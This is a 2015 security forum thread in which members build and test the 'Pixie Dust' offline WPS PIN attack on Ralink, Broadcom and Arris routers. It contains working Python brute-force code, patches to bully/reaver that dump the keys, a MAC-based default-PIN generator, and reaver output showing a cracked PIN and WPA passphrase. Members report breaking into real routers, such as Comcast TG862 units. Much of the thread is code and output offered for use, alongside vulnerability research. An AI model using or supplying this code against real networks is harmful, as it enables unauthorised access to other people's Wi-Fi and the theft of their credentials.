seems like there's an another project on Pixie Dust.
http://www.crack-wifi.com/forum/topi...ns.html#p75984
only it's in French.
any natives?
Member
seems like there's an another project on Pixie Dust.
http://www.crack-wifi.com/forum/topi...ns.html#p75984
only it's in French.
any natives?
Senior Member
Need to modify bully. That French forum is essentially the same thing as we have on here
Senior Member
Normally the router should correct the checksum and just admit valide PIN (that respects the rules of the wifi aliance) also a few routers showed to admit non-legitmate PIN (without checksum)@kcdtv
Yeah, I know what you mean referring to the checksum digit: computing it everytime or having an array of already pre-computed digits. Could be an option.
In any case bruteforcing 11'000 digits or 20'000 doesn't make any difference on modern processors (after the PRNG seed is bruteforced). Also, if the PIN is chosen by the user, then it's most likely that the checksum won't match (odds are 1/10).
Anyway that's a detail and as you sayed wil not make any difference...
The next big chalenge is to set the brute force of the seed for models with a "more complex"pattern than ES-1=ES-2=0
my english is so-so and i often difficulties to understand myself in shakspeare's language. People says english is easy but they are wrong, or it is because they don not mind to speak with faults or imprecislyI'm not sure about your question on the AuthKey. It is the key used in the HMAC_SHA-256 hash function and it's 32 bytes (256 bits) long (it's not truncated).
To make an example: E-Hash1 = HMAC_SHA-256{AuthKey [32 bytes]}(ES-1 [16 bytes] || PSK1 [16 bytes] || PKE [192 bytes] || PKR [192 bytes]).
By the way you exactly answered my questions
Thanks
i am native and i actually moderate this forum with Spawn ("qolund" here, see message #32)Originally Posted by wn722
We are working all together, don't wory for this, if we discover something relevant in crack-wifi.com i will post it as soon as poosible here in english.
wiite did half of the job by
1) making the first public attack vs ralink
2) coding the "Ralink" case ES-1=ES-2=NULL
we need to do the second half
1) making the first atack vs broadcom
2) coding the broadcom case where brute force of PRNG is needed
and we are all there basically... Yesterday we made half of the way
I also openedd a thread on a spanish forum to get more colaboration (but we just started it, it is stil not offcialy launch and we are 2 admin with 2 users)
abnyway, if something comes out one way or the other it wil be known here inmediatly
let's keep on the good work! Cheers to everybody
Member
Let me quote part the WPS specification document (hope I'm allowed):
"For 8-digit numeric PINs, the last digit in the PIN is used as a checksum of the other digits. This has the disadvantage of reducing the entropy of the PIN. It has the advantage, however, of enabling errors in user input of the PIN to be detected and potentially corrected before the PIN is actually used in the Registration Protocol. Users of course are not expected to compute checksums for passwords they choose, so user-specified Device Passwords do not include a checksum digit."
"Checksum digits are only included and validated for the Default (PIN) device password type, and only if an 8-digit PIN is used."
You may be right but of course, vendors do what they want... we know. I saw PINs that didn't match the checksum too. I'll add the checksum optimization soon.
English IS difficult, a new language is. That's why Esperanto was inventedBy the way, I'm a non-native speaker. I learned english (mostly) on the Internet so my speaking could be a bit misleading sometimes.
Last edited by wiire; 2015-03-20 at 18:05.
Junior Member
@wiire, So when will be able to try your tool? Can you send your e-mail with p.m? Thanks
Member
Soon hopefully. I'm kinda busy at the moment. I'll host the code on GitHub and make a new thread with tutorial when completed or available for "beta testing". Let's stick to the subject's thread for now. If someone has information or suggestions on the PNRG attack, please share.@wiire, So when will be able to try your tool? Can you send your e-mail with p.m? Thanks
Senior Member
I just know one case of a router model that has a default PIN that doesn't respect the checksum rule , it was used by telefonica (spanish ISP) and it is the "Amper" ASL-26555
otherwise i always saw default PIN that respect the checksum rules
for the checksum if you need any help i can explain you every step in details.
this is the ZaoChunsheng C code called ComputePIN and at the end you can see the function he uses to generate the checksum with a while loop
Code:#include <stdio.h> #include <stdlib.h></code> int main() { unsigned int wps_pin_checksum(unsigned int pin); int PIN = 0; printf("ComputePIN-C83A35\n"); printf("Description:\n"); printf("If your wireless router MAC address start with \"C83A35\",\n"); printf("type the other six digits, you might be able to get the \n"); printf("WPS-PIN of this equipment, please have a try, good luck!\n\n"); printf("Code by ZhaoChunsheng 04/07/2012 http://iBeini.com\n\n"); printf("Input MAC Address(HEX):c83a35"); scanf("%x",&PIN); printf("MAC Address(HEX) is: C83A35%X\n",PIN); printf("WPS PIN is: %07d%d\n",PIN%10000000,wps_pin_checksum(PIN%10000000)); return 0; } unsigned int wps_pin_checksum(unsigned int pin) { unsigned int accum = 0; while (pin) { accum += 3 * (pin % 10); pin /= 10; accum += pin % 10; pin /= 10; } return (10 - accum % 10) % 10; }
This PDF is VERY interesting : it is realiy focused on brute force issues vs Diffie-HellmanIf someone has information or suggestions on the PNRG attack, please share.
Exploring Diffie-Hellman Encryption
Senior Member
Anyone who has an XFINITY gateway... what are your model numbers? Seems like Comcast might have a HUGE problem to deal with soon...
Junior Member
Can u post a mirror of the link?@soxrok2212
Thank you for the explaination. I'll be sure to study the subject thoroughly when I'll have a bit more time. I'm a bit busy at them moment
Anyway, while we're waiting for someone able to modifiy reaver/bully, I've made a little program.
For now it just tries to bruteforce the PIN going throught all 20'000 combination (it doesn't use the checksum for now), assuming ES1 = ES2 = 0. Just feed it all the things needed:
- PKe
- PKr
- AuthKey
- E-Hash1
- E-Hash2
Tried on a TP-LINK (Ralink) and it just works.Bongard was right.
<link removed>
Here's a sample image:
EDIT: added the image properly. Removed link.
Thanks
Junior Member
Can u post a mirror of the link?
Thanks
Junior Member
code removed
Last edited by datahead; 2015-03-23 at 17:01.
Junior Member
code removed
Last edited by datahead; 2015-03-23 at 17:02.
Member
hey can anyone share the method of extracting
PKe
- PKr
- AuthKey
- E-Hash1
- E-Hash2
from cap files?
Senior Member
@ dathead
i dindn't learnt C or cryptologie (or maths) this week-end so I don't really get the details... (at all)
If i undesrtand well vendors uses may have used this "random function" :
http://opencores.org/ocsvn/openrisc/...t/src/rand.cxx
thank you for sharing your code , great job
Last edited by kcdtv; 2015-03-23 at 14:24.
Junior Member
Hi Guys,
I have coded the Pixie Dust Attack just when ES1=ES2=0 for Ralink devices. I have used the C code as test vector for the input data.
You can find it here : https://bitbucket.org/dudux/wpsoffline/
I am running out of time, but I would like to implement the bruteforce for the PRNG state for Broadcoms. After all, I would like to translate it to C into Reaver or bully. But surely someone is better C programmer and got more time than me.Code:import hashlib, hmac PK_E = "11e11709c0836c10e5a93a415f7869c5351f7218ab68867c3a1f8dbb9b8f984c"\ "e0eabcbfd212fdc04fd9b3675e9dd9578d53ed5904177bdbe4fe64008a4a47de"\ "50e7fc6409dc750b295565f54f1fe78582d78de0fac72675677cb1c85c5ca46a"\ "5fced284ad79a27b4c38038b207ee76d3d556d7c3606310e52f5c6123a1f4997"\ "6566cc21c31d40e5412decb2712d07667ac0803b21ca1df15f8f25814dc313cf"\ "7bcdffeac436b5f2d40ceb18df5d90ac1e545eddd43ec7e78d4970d313a65746".decode("hex") PK_R = "531ff143e7ef3663de555704904fbe5417a2b465f175cf55e01ab94cff9156d3"\ "b6c272d1315fa70c4719897cea28f984ba0eccf22e86f48d4f8a275fcc78e37a"\ "b81e917a376e038595ab980d57898224aed228052f29efa6299f11cd4d7aa562"\ "b7baf1404ae8a15b70c130718cb1e0db6a32af3be2eb073927ef414ea2fd5ced"\ "6595a95c5e28fa3badf69ddb15f9f74deb1690139122eab14f99adc9d360f7d4"\ "f066fab35b77a46eb7286172eae8dd7eda768849307f9b00f06d69571b9da243".decode("hex") eHash1 = "c14b83a3415999bba082f467872fd4bc9b79778b33d1d20cab55cb7d0b96cf43".decode("hex") eHash2 = "3516ace7cd46bcbcac83b3065be66a89186a54da8800d336041e8ab847929416".decode("hex") AuthKey = "d5c7e4a9fb5911b31dcbf80db712b34ed71a9218c9c111992c60d883e197e9ea".decode("hex") # if ES1,ES2 are found out, recover the halves of PIN second_half = first_half = 0 es1 = es2 = '\00' * 16 # (str(es2).zfill(32)).decode('hex') for first_half in xrange(10000): PSK1_guess = hmac.new(AuthKey, (str(first_half)).zfill(4), hashlib.sha256).digest()[:16] eHash1_guess = hmac.new(AuthKey, es1 + PSK1_guess + PK_E + PK_R, hashlib.sha256).digest() if (eHash1 == eHash1_guess): #First half done for second_half in xrange(10000): PSK2_guess = hmac.new(AuthKey, (str(second_half)).zfill(4), hashlib.sha256).digest()[:16] eHash2_guess = hmac.new(AuthKey, es2 + PSK2_guess + PK_E + PK_R, hashlib.sha256).digest() if (eHash2 == eHash2_guess): print "PIN FOUND! %04d%04d" %(first_half,second_half) # doWPSprotocolWithPINguessed() #TODO exit()
Proost!
Junior Member
I forgot to say that: "I blindly implemented the attack in the proof-of-concept of "wpscrack.py". It is only useful for Ralink's devices as TPLINKS routers.
I have not tested the attack in live! This code does the right offline bruteforcing. However, IT HAS NOT BEEN TESTED YET! Feel free to tweak it as you wish or do commit requests.
Usage:
wpscrack_mod:$ sudo python wpscrack.py -i mon0 -b [BSSID] -s [ESSID] --offline -vv
Senior Member
Updated with a database in the original post
Junior Member
dudux, It say all the time "PIN FOUND! 57334196" for every routers.
Member
Still Attack not available for BroadCom..
Junior Member
You need to edit the file and put your own data. I dont know where PKR,PKE data is in the packets, thats where im stuck.
Tryed the tool and is giving me
But im trying against Broadcom and not Ralink, as said above Broadcom is not implemented yet.Code:Trying 00000000 -> 802.11 deauthentication -> 802.11 authentication request TIMEOUT!!
I hope guys keep developing this subject, its very interesting but over my personal understanding to put in practice, so ill have to wait.
Would it be feasible to add a import from cap feature? i guess that would put some testers running. Thanks everyone
Senior Member
@everyone There is NO official and complete tool available yet. Stop asking. When it is available, one of us will make a post.
Senior Member
@dudux was the realtek.cap file what you used to make wpsOffline.py? Unless im doing it wrong, Im not getting the same pke, pkr, or any of it.
Senior Member
SMCD3GNV and WRT160Nv2 confirmed vulnerable!
the tool works i have corrected the code now
@sorox2212
cracked 3 routers
and all of them were right
Senior Member
Can you post the model numbers, manufacturers, and hardware numbers so I can add it to the database?
Senior Member
Dudu has asked me to post a python implementation for Ralink devices! You can get it here: https://bitbucket.org/dudux/wpsoffli...e.py?at=master
All credits go to dudu! Look at the help section for the arguments. Good luck an post any successes with models here! Thanks!!!!
Last edited by soxrok2212; 2015-03-26 at 18:52.
Senior Member
Tried the tool also and it is only giving the same results, but i am trying against an ralink tplink router. Unmodified code does the same.
Looking through the wireshark logs, it is attempting to authenticate, but the script isn't recognizing it is getting a response, I don't really
know enough about python to dig into it, more of a perl guy than python. Starting to learn it though. Trying to extract the part in wpscrack.py
that creates the authkey and feed it what it wants to spit out the authkey, if that's even going to work... From what I am reading about the
KDK it only partialy makes sense to me.
Tried the modified version of bully also, just seems to run normaly, trying pins and moving on to the next. Still confused on how this is
supposed to give the Authkey, which is where I am stuck. I assume it doesn't give it to you automatically, so how do you get it to give
the authkey?
I can get everything else as it's in plain sight. I have a couple ralink routers at my disposal to test this on also.
I thought it wasn't obtained from wireshark and you had to run it through the KDK... That just confused me even more...Code:maingroup.add_argument('-ak', '--AuthKey', type=str, nargs='?', help='AuthKey obtained from wireshark')
Senior Member
WPSCrack.py I guess only works with Atheros wireless adapters. Try this to get more info.. comes from Hack Forums:
Then please post this here:Code:int wpa_debug_level = MSG_INFO; // change it to MSG_DEBUG 2: Or, manually add some prints in the (wpa_supplicant) source. Let's take as an example bully (you could try reaver if you wish): - Download the zip file. Unzip it. - Go to bully-master/src/wps and open wps_common.c with a text editor. - Go to line 122 and add something similar (just a print): Code: os_memcpy(wps->emsk, keys + WPS_AUTHKEY_LEN + WPS_KEYWRAPKEY_LEN, WPS_EMSK_LEN); /****** ADD THIS PART ******/ printf(" > AuthKey: "); int pixiecnt = 0; for (; pixiecnt < WPS_AUTHKEY_LEN; pixiecnt++) { printf("%02x", *(wps->authkey + pixiecnt)); if (pixiecnt != WPS_AUTHKEY_LEN - 1) { printf(":"); } } printf("\n"); /******/ wpa_hexdump_key(MSG_DEBUG, "WPS: AuthKey", - Now open wps_registrar.c. - Go to line 1719 (inside wps_process_e_hash1 function) and add: Code: wpa_hexdump(MSG_DEBUG, "WPS: E-Hash1", wps->peer_hash1, WPS_HASH_LEN); /****** ADD THIS PART ******/ printf(" > E-Hash1: "); int pixiecnt = 0; for (; pixiecnt < WPS_HASH_LEN; pixiecnt++) { printf("%02x", *(wps->peer_hash1 + pixiecnt)); if (pixiecnt != WPS_HASH_LEN - 1) { printf(":"); } } printf("\n"); /******/ return 0; - Then in the function below (inside wps_process_e_hash2) add: Code: wpa_hexdump(MSG_DEBUG, "WPS: E-Hash2", wps->peer_hash2, WPS_HASH_LEN); /****** ADD THIS PART ******/ printf(" > E-Hash2: "); int pixiecnt = 0; for (; pixiecnt < WPS_HASH_LEN; pixiecnt++) { printf("%02x", *(wps->peer_hash2 + pixiecnt)); if (pixiecnt != WPS_HASH_LEN - 1) { printf(":"); } } printf("\n"); /******/ return 0;
First 3 are optional, last 6 are mandatory to crack.Code:AP Manufacturer: Model name/number: Chipset: N1 Nonce: Authkey: PKE: PKR: E-Hash1: E:Hash2:
Last edited by soxrok2212; 2015-03-26 at 21:20.
Junior Member
Yeah authkey is generated, sorry I just copied&pasted.........
The code is right here. I guess that the community will release a fresh & quick patch for reaver or bully. Be patient and try to understand the flaw itself!
Code:def gen_keys(self): pubkey_enrollee = self.bignum_unpack(self.PK_E) pubkey_registrar = pow(2, self.secret_number, self.prime_int) shared_key = self.bignum_pack(pow(pubkey_enrollee, self.secret_number, self.prime_int), 192) self.PK_R = self.bignum_pack(pubkey_registrar, 192) self.RNonce = os.urandom(16) DHKey = hashlib.sha256(shared_key).digest() KDK = hmac.new(DHKey, self.ENonce + self.EnrolleeMAC + self.RNonce, hashlib.sha256).digest() self.AuthKey, self.KeyWrapKey, self.EMSK = self.kdf(KDK, 'Wi-Fi Easy and Secure Key Derivation', [256, 128, 256]) self.R_S1 = '\00' * 16 #random enough self.R_S2 = '\00' * 16 self.PSK1 = hmac.new(self.AuthKey, self.pin[0:4], hashlib.sha256).digest()[:16] self.PSK2 = hmac.new(self.AuthKey, self.pin[4:8], hashlib.sha256).digest()[:16] self.RHash1 = hmac.new(self.AuthKey, self.R_S1 + self.PSK1 + self.PK_E + self.PK_R, hashlib.sha256).digest() self.RHash2 = hmac.new(self.AuthKey, self.R_S2 + self.PSK2 + self.PK_E + self.PK_R, hashlib.sha256).digest()
Last edited by dudux; 2015-03-26 at 22:32.
Junior Member
Thanks for the script Dudux, worked for me on a belkin F5D8236-4 v3.
Junior Member
@h4x0rm1k3: which script did you use?
Member
Well Explained Pixie Dust Attack in This Document...
http://www.fileconvoy.com/dfl.php?id...611e6156c2908c
Senior Member
Realy?
....Did you read the first post of this thread?
Exactly: wpscrack doesn't works with USB adapaters (althought i didjn't try with "the" chipset USB atheros - ah9k_htc )
It is according to me the worst and least interesting option ( compared to reaver or buly)
cheers
Last edited by kcdtv; 2015-03-29 at 01:33.
Senior Member
Confirmed to work with TG862 v5
Trying to find a bit more automation in this, because what i have to do now to get it to work is kind of a pain...Code:PK_E = "1fa58df039d88bd13c4fce5dddf90dc5062f33f3d853e1675c793c5c0039102c3a9c82041e366f3e7fef39d050340bb134ce4c0c628657ecf48bb64bfea172409b21dfb760ab2c0b41d5577860c99a8625f06a8dc7e20c866c1656f1e94b37873e80b137a33b265149574a3a55183a6665d9ade3bce174a2f2e24c3bba1f6d53adaf75d8d966952772decbb776aeb43a7b1291f3f4e57572ffccd16ee81f74fc05f257fc1a7d98bdc8e31e81653119cf0f2f20db1744c3b503be7e8f11975148" PK_R = "84bda17b3566d94551e34222eb01f1302bd3f57efddd8facddb14e2ddeddd616794e51a99e084d6c0f90bfea1fce7bdb7ce0951c04820a39685117ce9f4c54111d48c69318e9269ed4a4d77112b34418825517a9a772ddb448278ec849ec7177fcb8a925ba1ce34579a712af5e964a8394ef09c38bc34878ee965cbaa890cf0bf3a2500dd455193cf8d0443a65fdebb2312cae514968bf4090423795860fa5b419ff61f37ef25d2af364fabec0da547241e794e1b2ca7562aec072bcd76b9218 eHash1 = "991ea46545f722945b7e356f58549264773a2d08b39129ee43ba818518044842" eHash2 = "e2b5ca0c9534d1dceb41327000d5e00ce973c27071726088b8b4c89d3c7ba487" AuthKey = "cbaa229e34bb288167c3412e5c9c32478a897e16cce47b8e3c4de9ef4eb2fcdb"
Member
can you write that down?
i'd like to give it a go as well
cheers.
Senior Member
Musket Teams have done the rewrite of bully as suggested in a thread above. One computer seems to provide all five keys, another computer only provides the keys -authkey hash1 and hash2 and only if the -o command is in the bully command line(ie write to file). It then appears on the screen not in the file. In this case you must also run wireshark to get the -pke and -pkr
You must download the source file rewrite the two files in the install package then reinstall. If during reinstall you get a pcap.h warning then:
sudo apt-get install libpcap-dev
Then reinstall. Method for reinstall is found in the README.md
If you are trying to rewrite reaver - (our team is working on this as we speak) note that the wps_common.c file works for both reaver and bully BUT the wps_registrar.c is different. You must rewrite each version of wps_registrar.c. The same command lines to change exist - but the reaver file has file links not found in bully causing the install to fail if the bully version is used.
MTeams
Senior Member
Did you actually test the pin with reaver/bully and find the WPA key? There has been an issue reported where TG862 tests report a false positive... I tested your data and got the same pin 42000648 as someone else who tested that same model.
Last edited by soxrok2212; 2015-03-29 at 12:55.
Senior Member
@soxrok2212 yes I did test the pin and it did work. Oddly enough I seem to be getting the same pin for multiple routers. The ones that have the default essid of HOME-XXXX all seem to be producing the same pin. I've only tested it on that one so far. Could xfinity have given the same pin to all the tg862 routers? That would be a MAJOR oops!
Senior Member
Just checked the configuration of the router and the pin DOES NOT match. The pin in the configuration was 84237446
Screenshot2.png
But attempting 42000648 does indeed work!
But attempting the pin in the configuration doesn't work. And unless i am looking at this wrong, in the screenshot above, isn't wps pin entry diabled?Code:root@kali:~/Desktop# reaver -b 00:AC:E0:3E:DB:10 -vv -i mon0 -p 42000648 Reaver v1.4 WiFi Protected Setup Attack Tool Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]> [+] Waiting for beacon from 00:AC:E0:3E:DB:10 [+] Switching mon0 to channel 6 [+] Associated with 00:AC:E0:3E:DB:10 (ESSID: HOME-XXXX) [+] Trying pin 42000648 [+] Sending EAPOL START request [+] Received identity request [+] Sending identity response [+] Received M1 message [+] Sending M2 message [+] Received M3 message [+] Sending M4 message [+] Received M5 message [+] Sending M6 message [+] Received M7 message [+] Sending WSC NACK [+] Sending WSC NACK [+] Pin cracked in 9 seconds [+] WPS PIN: '42000648' [+] WPA PSK: 'basket1744chase' [+] AP SSID: 'HOME-XXXX' [+] Nothing done, nothing to save.
Last edited by aanarchyy; 2015-03-29 at 16:57. Reason: Typo
Senior Member
I'm glad you tested it
Junior Member
I just had this same thing happen with a TG862
M1 wps.enrollee_nonce : bd2fb84d8cd392268432a86692f45081
M1 wps.public_key : 26523c5c10fbecb8dacebd499b943381dd5d959a19b0dd3de6 d6092296be009f6d0043e0d0468b6169640a42c2a755451d6a a21c0c9fa581868ffc39cb9b9dd61f75f2d1b37b10724fe526 3f2f0ef51d447a37c04d3634b3cadb864209b6288276daa193 10c1414162af40da6d5cf524791ce746fb4e6bb044fe531683 a4f57cd4e864a4beb6b9e397c10f1b2673306ef6ccb81e8cff 0086cbbddb546d2e33a4ce02f305d36f1a6d3e6a075dace5e4 54a7b7fc41b9df1a4739b67c071da0b4ba
M2 wps.enrollee_nonce : bd2fb84d8cd392268432a86692f45081
M2 wps.public_key : 1c5abc81aa3b2e019322275d81fdba8d781a670c7bbb2e72f1 41b9559fba622f1d664a2d088f3d86aec4ac054d8fe32afa61 5c44641e0b87736f5f533edbf4c2c170d38fab28aaadecb812 687b1d69f5314179c1b8c71d5f6302788a112826cb2e359703 d4039a9ee4c2c7d8f3cc2174db2738f67cc64677111d995680 42d38748fd0963cabda0ee6c2eb911d428647b9401df6d4ac7 5e7c9d57ddcf914bcf18f9dd138b3a09726b5c906f6a539cbe cab2fc2acd415168e424d4cd45db6f8008
M2 wps.registrar_nonce : bdb64e739ce8e78915d839945a6a4882
M2 wps.authenticator : 25706c21a1637948
M3 wps.registrar_nonce : bdb64e739ce8e78915d839945a6a4882
M3 wps.authenticator : 8c8ac40a5d2fba7c
M3 wps.e_hash1 : 40d578a860d7c7b7fa9164734821be696de11dde1026b62e58 6027685d44bda6
M3 wps.e_hash2 : 47f0d473cbb32fee2ebe20ce4f151c15a17d6b7695fa536ed7 779369de8e6a81
M4 wps.enrollee_nonce : bd2fb84d8cd392268432a86692f45081
M4 wps.authenticator : d1a7f72e8569b045
M4 wps.encrypted_settings : 97e680a1c5c31d6ff777219bb0f1928cdbc056f38f894530cf f61b317343cd599b2a3501a7defe012fcab40097efa202e927 7d5605bfa84e62be20b985db5797
M4 wps.r_hash1 : a9def4675aa789fe6f6d1cbb2e5a428184690698a6a65f9a80 05c147b5cd73a1
M4 wps.r_hash2 : 2b84cb17f955b22fe165c4bfa2b81a0d41ae7681960269063f c7e11fd48660dc
Client wps.manufacturer :
Client wps.device_name :
Client wps.os_version : 2147483648
Client wlan.ta : 00:19:e3:06:7e:44
Client wps.model_name :
Client wps.model_number :
Client wps.serial_number :
AP wps.manufacturer : ARRIS
AP wps.device_name : ARRIS TG862 Router
AP wps.os_version : 2147483648
AP wlan.ta : 00:1d:d6:ab:8f:40
AP wps.model_name : TG862G
AP wps.model_number : RT2860
AP wps.serial_number : 12345678
Adittionaly it appears to receive the creds then fail the WPS ?
<3>CTRL-EVENT-SCAN-RESULTS
<3>WPS-AP-AVAILABLE
<3>CTRL-EVENT-SCAN-RESULTS
<3>WPS-AP-AVAILABLE
<3>SME: Trying to authenticate with 00:1d:d6:REDACTED (SSID='HOME-FFFF' freq=2412 MHz)
<3>Trying to associate with 00:1d:d6:REDACTED (SSID='HOME-FFFF' freq=2412 MHz)
<3>Associated with 00:1d:d6:REDACTED
<3>CTRL-EVENT-EAP-STARTED EAP authentication started
<3>CTRL-EVENT-EAP-PROPOSED-METHOD vendor=14122 method=1
<3>CTRL-EVENT-EAP-METHOD EAP vendor 14122 method 1 (WSC) selected
<3>WPS-CRED-RECEIVED 100e003c102600010110450009484f4d452d38463432100300 020022100f0002000c10270010314443384538303932413943 3030343110200006001dd6ab8f40
<3>WPS-FAIL msg=11 config_error=0
<3>CTRL-EVENT-EAP-FAILURE EAP authentication failed
<3>WPS-FAIL
<3>CTRL-EVENT-DISCONNECTED bssid=00:00:00:00:00:00 reason=3
<3>CTRL-EVENT-SCAN-RESULTS
<3>WPS-AP-AVAILABLE
<3>SME: Trying to authenticate with 00:1d:d6:REDACTED (SSID='HOME-FFFF' freq=2412 MHz)
<3>Trying to associate with 00:1d:d6:REDACTED (SSID='HOME-FFFF' freq=2412 MHz)
<3>Associated with 00:1d:d6:REDACTED
<3>WPA: Key negotiation completed with 00:1d:d6:REDACTED [PTK=CCMP GTK=TKIP]
<3>CTRL-EVENT-CONNECTED - Connection to 00:1d:d6:REDACTED completed (reauth) [id=11 id_str=]
<3>CTRL-EVENT-DISCONNECTED bssid=00:1d:d6:REDACTED reason=4
<3>CTRL-EVENT-SCAN-RESULTS
<3>WPS-AP-AVAILABLE
<3>SME: Trying to authenticate with 00:1d:d6:REDACTED (SSID='HOME-FFFF' freq=2412 MHz)
<3>CTRL-EVENT-SCAN-RESULTS
<3>WPS-AP-AVAILABLE
<3>CTRL-EVENT-SCAN-RESULTS
<3>WPS-AP-AVAILABLE
<3>CTRL-EVENT-SCAN-RESULTS
<3>WPS-AP-AVAILABLE
<3>SME: Trying to authenticate with 00:1d:d6:REDACTED (SSID='HOME-FFFF' freq=2437 MHz)
<3>Trying to associate with 00:1d:d6:REDACTED (SSID='HOME-FFFF' freq=2437 MHz)
<3>Associated with 00:1d:d6:REDACTED
<3>CTRL-EVENT-EAP-SUCCESS EAP authentication completed successfully (based on lower layer success)
<3>WPA: Key negotiation completed with 00:1d:d6:REDACTED [PTK=CCMP GTK=TKIP]
<3>CTRL-EVENT-CONNECTED - Connection to 00:1d:d6:REDACTED completed (reauth) [id=11 id_str=]
Member
hey. where exactly is that link?
in first post of this topic or there's another topic?
Senior Member
Other HOME-XXXX networks I have tested did produce a different pin. But I was unable to verify the pins as the wps process on the router crashed (?), I will try and verify the pins on those later.I'm glad you tested it
But two of the HOME-XXXX(Arris routers) networks I tested produced the same pin, only one verified.
I was thinking more like, if wps is disabled in the settings, it doesn't actually disable, instead it just changes to the default pin of 42000648. Anyone else confirm?
Senior Member
Well someone else from Hack Forums reported the same exact issue and returned the same exact pins but thought they were just found in error so he didn't try them. He will try them in the next few days though...
Also, comcast uses a few different gateways as well (SMC for example, which is also ralink and vulnerable), so maybe that is why you got different pins.
Last edited by soxrok2212; 2015-03-30 at 01:07.
Senior Member
To wn722
See thread #78 above posted by Soxrok2212
Any problems write here and we will talk you thru the process. Our problem is confirming the -pke -pkr. Any commentary would be helpful.
MTeams
Senior Member
As of now, PKE and PKR can be found in wireshark in M1 and M2 packets... I haven't been able to find where they are debugged in reaver's source. Still looking into it.
Junior Member
Dudux, I used the 1 pasted by soxrok that you asked him to post on bitbucket. This one - https://bitbucket.org/dudux/wpsoffli...e.py?at=master
Senior Member
I've been digging through the source of bully/reaver also looking for where they are parsed also, so far nothing but dead ends, though I don't really know c very well either. Digging around where it mentions pubkey seems to be around where it would be though. Bear with me here, picking it up as I go. :-)
Hopefully something we can feed a pcap through to give all the required info, derive the pin, and if successful spawn reaver/bully to test and retrieve the psk. Though a live solution would be better ie a patch to bully/reaver.
Senior Member
Datahead and I began digging into Netgear router's source and found some interesting bits of information. We think that we might have found how the actually pin is generated... Simply with a defined rand() function. It looks as if it uses the dev password (which can be found in the M1 packet in a WPS transaction) and has something to do with the system time. We are looking for help from crypto people who know what they are doing. It's looks promising, the same thing was found in 2/2 checked source codes so far: WNDR3400v2 and R6300v1.
Senior Member
Very interisting what you say about netgear... are you talking about cg3100 series?
And... *** with the Router with 2 PIN enabled? How did they manage that
Very good work guys, it is impressing
Posting Permissions
